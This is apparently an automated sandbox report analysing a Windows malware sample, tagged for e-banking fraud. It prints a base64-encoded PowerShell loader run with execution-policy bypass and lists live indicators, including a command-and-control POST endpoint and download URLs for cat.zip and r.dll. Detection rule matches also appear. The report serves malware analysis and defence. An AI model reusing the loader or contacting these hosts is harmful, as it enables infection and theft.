JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARg
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARg
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2952, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Nvidia-75619\Nvidia-75619.exe (copy)ReversingLabs: Detection: 23%
Source: C:\Nvidia-75619\play.exeReversingLabs: Detection: 23%
Source: PVKDyWHOaX.exeVirustotal: Detection: 25%Perma Link
Source: PVKDyWHOaX.exeReversingLabs: Detection: 26%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
Source: PVKDyWHOaX.exeJoe Sandbox ML: detected

Compliance

barindex
Source: PVKDyWHOaX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PVKDyWHOaX.exeStatic PE information: certificate valid
Source: unknownHTTPS traffic detected: 34.95.215.169:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: PVKDyWHOaX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Nvidia-75619.exe, 0000000B.00000002.2625232422.0000000003B41000.00000020.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Nvidia-75619.exe, 0000000B.00000002.2625232422.0000000003B41000.00000020.10000000.00040000.00000000.sdmp
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global trafficHTTP traffic detected: POST /avs_pro/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 135Host: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /notafiscal/download/cat.zip HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 18 Dec 2024 07:18:28 GMTUser-Agent: Microsoft BITS/7.8Host: site.webmailcontabilidadecrx.net
Source: global trafficDNS traffic detected: DNS query: site.webmailcontabilidadecrx.net
Source: unknownHTTP traffic detected: POST /avs_pro/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 135Host: 23.94.207.151
Source: Nvidia-75619.exe, 00000009.00000003.3099082671.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/
Source: Nvidia-75619.exe, 00000009.00000003.3098974236.0000000001659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/avs_pro/index.php
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0(
Source: svchost.exe, 00000006.00000002.3641498496.0000016231C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Nvidia-75619.exe, 0000000B.00000003.2603014519.0000000005410000.00000004.00001000.00020000.00000000.sdmp, Nvidia-75619.exe, 0000000B.00000002.2606119470.0000000001CAB000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
Source: powershell.exe, 00000002.00000002.4663430952.0000021F6B070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.A
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2197003075.0000016231AD0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2459529162.0000016231AD5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3641776541.0000016231C85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3639660566.0000016232060000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3641776541.0000016231C61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2259995674.0000016231AD1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3639631187.0000016231E30000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2284683714.0000016231AD4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3640236884.000001622CF04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3639971823.000001622D340000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3640613994.0000000100DFB000.00000004.00000010.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zip
Source: svchost.exe, 00000006.00000002.3641776541.0000016231C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipe
Source: powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/receive_info.php
Source: svchost.exe, 00000006.00000002.3641776541.0000016231C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/r.dll
Source: svchost.exe, 00000006.00000002.3641776541.0000016231C85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3641776541.0000016231C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net:443/notafiscal/download/cat.zip
Source: powershell.exe, 00000002.00000002.4592726963.0000021F03220000.00000004.00000800.00020000.00000000.sdmp, PVKDyWHOaX.exe, play.exe.2.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 34.95.215.169:443 -> 192.168.2.5:49712 version: TLS 1.2

E-Banking Fraud

barindex
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior

System Summary

barindex
Source: amsi64_348.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 348, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: PVKDyWHOaX.exe, _88.csLong String: Length: 22184
Source: play.exe.2.drStatic PE information: section name: .!Zx
Source: play.exe.2.drStatic PE information: section name: .]#m
Source: play.exe.2.drStatic PE information: section name: .2"V
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-75619\play.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-75619\Nvidia-75619.exe (copy)Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F26AC32_2_00007FF848F26AC3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F1C4A82_2_00007FF848F1C4A8
Source: PVKDyWHOaX.exe, 00000000.00000002.4591980859.00000000015BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs PVKDyWHOaX.exe
Source: PVKDyWHOaX.exe, 00000000.00000000.2135324846.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDASMEI.exe0 vs PVKDyWHOaX.exe
Source: PVKDyWHOaX.exeBinary or memory string: OriginalFilenameDASMEI.exe0 vs PVKDyWHOaX.exe
Source: PVKDyWHOaX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi64_348.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
